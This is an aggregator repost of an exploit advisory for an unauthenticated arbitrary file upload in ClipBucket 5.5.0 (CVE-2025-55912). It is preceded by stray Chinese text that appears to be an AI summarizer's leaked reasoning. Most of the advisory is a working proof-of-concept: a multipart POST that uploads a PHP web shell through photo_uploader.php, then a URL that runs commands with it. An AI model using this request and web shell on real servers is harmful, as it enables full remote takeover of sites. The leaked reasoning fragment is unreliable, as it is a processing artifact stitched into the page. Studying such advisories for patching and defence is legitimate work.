ClipBucket 5.5.0 Arbitrary File Upload
好的,我现在需要帮用户总结一篇文章的内容,控制在100个字以内。首先,我得仔细阅读用户提供的文章内容,了解其主要信息。 文章标题是ClipBucket 5.5.0的任意文件上传漏洞,作者是Mukundsinh Solanki。漏洞描述中提到,ClipBucket在5.5.0及以下版本中存在未认证的任意文件上传漏洞,具体在`upload/actions/photo_uploader.php`文件中。攻击者可以上传恶意PHP文件,导致远程代码执行(RCE),从而完全控制应用和服务器。 接下来,用户提供了PoC请求示例,展示了如何通过POST请求上传一个包含system函数的shell.php文件,并通过访问该文件来执行命令。影响部分说明了漏洞可能导致的严重后果。 现在,我需要将这些信息浓缩到100字以内。重点包括:软件名称、版本、漏洞类型、攻击方式、影响以及CVE编号。确保语言简洁明了,直接描述内容,不需要使用“文章总结”之类的开头。 可能会遇到的问题是如何在有限的字数内涵盖所有关键点。可能需要舍弃一些细节,比如测试环境、作者联系方式等。同时要确保技术术语准确无误。 最后,检查字数是否符合要求,并确保总结清晰传达了漏洞的核心信息。 </think> ClipBucket 5.5.0及以下版本存在未认证的任意文件上传漏洞,攻击者可通过上传恶意PHP文件实现远程代码执行(RCE),完全控制目标应用和服务器(CVE-2025-55912)。 2026-2-14 20:30:28 Author: cxsecurity.com(查看原文) 阅读量:1 收藏

# Exploit Title: ClipBucket 5.5.0 - Arbitrary File Upload # Google Dork: N/A # Date: 2025-09-11 # Exploit Author: Mukundsinh Solanki (r00td3str0y3r) # Vendor Homepage: https://clipbucket.com # Software Link: https://github.com/MacWarrior/clipbucket-v5 # Version: <= 5.5.0 # Tested on: Ubuntu 20.04 LTS, PHP 7.4 # CVE: CVE-2025-55912 ## Vulnerability Description: ClipBucket <= 5.5.0 suffers from an unauthenticated arbitrary file upload vulnerability in `upload/actions/photo_uploader.php`. Missing access controls and insufficient validation of uploaded files allow an attacker to upload a crafted PHP file and execute it remotely, leading to full remote code execution (RCE). ## PoC Request: POST /upload/actions/photo_uploader.php HTTP/1.1 Host: victim.com Content-Type: multipart/form-data; boundary=----BOUND ------BOUND Content-Disposition: form-data; name="Filedata"; filename="shell.php" Content-Type: application/x-php <?php system($_GET['cmd']); ?> ------BOUND-- The file is uploaded without authentication. The attacker can then access it: http://victim.com/files/photos/shell.php?cmd=id ## Impact: - Unauthenticated remote code execution (RCE) - Full compromise of target application and underlying server Regards, Mukundsinh Solanki +916355251151



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026020012
如有侵权请联系:admin#unsafe.sh